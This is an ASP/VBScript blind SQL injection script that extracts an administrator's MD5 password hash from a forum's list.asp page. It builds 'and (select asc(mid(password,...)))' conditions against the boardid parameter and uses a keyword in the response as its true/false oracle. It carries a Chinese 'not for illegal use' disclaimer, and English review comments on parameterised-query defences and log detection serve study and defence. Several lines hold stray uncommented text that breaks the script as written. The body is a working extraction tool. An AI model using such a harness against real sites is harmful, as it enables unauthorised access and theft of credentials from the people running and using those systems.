请勿用于非法用途。本代码仅为帮助广大 ASP 爱好者理解其原理,以便防范于未然。
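' Convert a raw byte string (e.g. an XMLHTTP responseBody) into a VBScript string.
' Bytes below &h80 become one character each; a byte of &h80 or above is treated
' as the lead byte of a two-byte character and combined with the byte after it
' (lead byte in the high half, trail byte in the low half).
' Fix: the original read midb(vin, i+1, 1) even when i was the last byte, and
' ascb("") raises "Invalid procedure call or argument". A lone lead byte at the
' end of the input is now emitted on its own instead of raising.
' vin: byte string (lenb() sized). Returns the decoded string; "" for empty input.
function bytes2bstr(vin)
    dim strreturn
    dim i, thischarcode, nextcharcode, total
    strreturn = ""
    total = lenb(vin)
    i = 1
    do while i <= total
        thischarcode = ascb(midb(vin, i, 1))
        if thischarcode < &h80 or i = total then
            ' Single-byte character, or a trailing lead byte with no trail byte left.
            strreturn = strreturn & chr(thischarcode)
        else
            ' Two-byte character: consume the trail byte as well.
            nextcharcode = ascb(midb(vin, i + 1, 1))
            strreturn = strreturn & chr(clng(thischarcode) * &h100 + cint(nextcharcode))
            i = i + 1
        end if
        i = i + 1
    loop
    bytes2bstr = strreturn
end function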
' Fetch url with a synchronous GET through MSXML2.XMLHTTP and return the
' response body decoded by bytes2bstr.
' Returns Empty (no assignment) when the request does not reach readyState 4.
' The trailing err.clear only does anything if the caller has enabled
' "on error resume next"; without it any failure propagates before that line.
function gethttppage(url)
    dim req
    set req = createobject("msxml2.xmlhttp")
    req.open "get", url, false
    req.send()
    if req.readystate <> 4 then exit function
    gethttppage = bytes2bstr(req.responsebody)
    set req = nothing
    if err.number <> 0 then err.clear
end function
' Return True when strng contains a match for the regular expression patrn.
' Matching is case-sensitive (ignorecase is explicitly False); only the first
' match matters, so the Global property is left at its default.
function regexptest(patrn, strng)
    dim re
    set re = new regexp
    with re
        .pattern = patrn
        .ignorecase = false
    end with
    regexptest = re.test(strng)
end function
' Driver: a boolean-based blind SQL injection harness, kept (per the file header)
' to show ASP developers how the technique works so they can defend against it.
' The code lines are the author's; the English comments are review notes. The
' trailing Chinese text on several lines below has lost its leading "'" and is
' not a valid comment as written.
' Defence: the vulnerable pattern is a page that concatenates a request parameter
' (here boardid) into a SQL string. Parameterised queries (ADODB.Command with
' Parameters) or strict numeric validation of boardid remove the flaw; uniform
' error pages and rate limiting only slow this kind of enumeration down.
' Detection: the web log shows a burst of requests to the same page whose
' boardid value carries "and (select asc(mid(password," followed by a changing
' position and candidate number.
password=""
' Text expected in the response when the injected condition holds. (Original
' note: the string that appears on a correctly returned page.)
keyword="论坛首页"返回正确页面会出现的字符串
' Entry URL; the boardid parameter is the injection point. (Original note: SQL
' injection entry point.)
url1="http://qq/bbs/list.asp?boardid=7"sql注入入口
' Assumes the stored value is a 32-character MD5 hex digest. (Original note:
' MD5 passwords are usually 32 characters.)
passlen=32md5密码通常是32位
dim pass
' Candidate character codes: "0"-"9" and "a"-"f". (Original note: password
' characters are usually 0-9, a-f.)
pass=array(48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102)密码值通常是0-9,a-f
server.scripttimeout=999
' One outer pass per character position; the inner loop tries each candidate
' until the page answers "true" for that position. i, j, flag, str and url are
' never declared (no option explicit in view).
for i=1 to passlen
flag=false
' The injected condition compares one character of admin.password with a
' candidate code; whether keyword appears in the reply is the oracle. (Original
' note: the constructed SQL statement - this is the key part.)
url=url1&" and (select asc(mid(password,"&i&",1)) from admin where id>0)="构造的sql语句这里才是关键
for j=0 to ubound(pass)
str=gethttppage(url&pass(j))
flag=regexptest(keyword,str)
if flag=true then
' A hit: record the character and move to the next position. If no candidate
' matches, nothing is appended and the position is silently skipped.
password=password&chr(pass(j))
exit for
end if
next
next
response.write(password)
